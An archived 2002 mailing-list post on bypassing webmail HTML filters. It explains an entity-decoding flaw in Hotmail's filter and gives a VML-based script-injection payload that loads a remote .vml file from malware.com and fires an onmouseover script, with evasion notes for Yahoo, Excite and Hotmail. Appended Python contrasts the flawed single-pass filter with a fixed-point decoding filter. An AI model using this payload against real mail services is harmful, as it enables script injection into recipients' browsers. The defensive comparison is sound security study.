<!--
So what about Hotmail ? Well, where can we put unicode in an html message ? Into an url as %xx, yep, but that's not the point here. There is a thing called "html entities" : you can replace *any* printable character by its ascii/unicode value in the values of the parameters of html tags, for instance in the parameters of the STYLE tag (hint !). "A" is A, "B" is B, etc.

What the hotmail filter did is replacing any html entity by its corresponding character, then trying to filter out any bad string (forbidden keywords), THEN giving the output to the user, without re-applying the filter on this output. But, if there are still html entities into this output, the user's browser will interpret them, that will possibly give birth to some interesting forbidden keywords... and fire a script.
-->

Excellent. Here's another one for you FozZY:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
<v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.malware.com/fooness.vml#malware"></v:vmlframe>

where fooness.vml#malware is:

<xml xmlns:v = "urn:schemas-microsoft-com:vml">
<v:rect id="malware" fillcolor="green" style="position:relative;top:1;left:1;width:20;height:20" onmouseover="alert('malware was here')">
</v:rect>
</xml>

1. This works on Yahoo and Excite, probably others
2. Quick fiddling suggests only mouseover works
3. Hotmail only filters this:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

which is absolutely required. Probably easier to mask than say "Javascript"

note 1/: can't recall, Hotmail may not allow for retrieval of files remotely, or base64 encodes them on the Hotmail server if there are any. If so, you can embed and CID: the fooness.vml

note /2: the above may also work in IE dependent mail clients (Eudora..?..)

note /3: doesn't want to work in Outlook Express with scripting off even though the frame aspect works - which is patched in OE6

--
http://www.malware.com
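The decode-once-then-filter flow described in the quoted text, next to a filter that decodes to a fixed point before checking, as an added example that is not part of the original post or of any webmail provider's code. The blocklist, the sample string and all function names are assumptions made for illustration, and Python's html.unescape stands in for both the filter's and the browser's entity decoding.

```python
import html

# Hypothetical blocklist; the post does not list the webmail filter's real keywords.
FORBIDDEN = ("javascript", "behavior")

# Constructed sample: the "j" is an entity whose "&" is itself entity-encoded.
SAMPLE = "&amp;#106;avascript"


def contains_forbidden(text):
    lowered = text.lower()
    return any(word in lowered for word in FORBIDDEN)


def single_pass_filter(value):
    """Flow described in the quoted text: decode once, check, emit the decoded text."""
    decoded = html.unescape(value)
    return None if contains_forbidden(decoded) else decoded


def browser_render(value):
    """Stand-in for the recipient's browser decoding entities in an attribute value."""
    return html.unescape(value)


def canonicalize(value, max_rounds=10):
    """Decode entities until the text stops changing; refuse absurd nesting."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("entity nesting too deep")


def fixed_point_filter(value):
    """Check the fully decoded form, then re-encode so no live entity is emitted."""
    try:
        canonical = canonicalize(value)
    except ValueError:
        return None  # reject rather than guess
    if contains_forbidden(canonical):
        return None
    return html.escape(canonical, quote=True)


if __name__ == "__main__":
    passed = single_pass_filter(SAMPLE)
    print("single pass emits:", passed, "-> browser sees:", browser_render(passed))
    print("fixed point emits:", fixed_point_filter(SAMPLE))
```

The same check has to run on whatever form is finally sent to the client, which is why the fixed-point version re-encodes its output instead of emitting decoded text.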
This archive was generated by hypermail 2b30 : Wed Jul 17 2002 - 18:12:04 PDT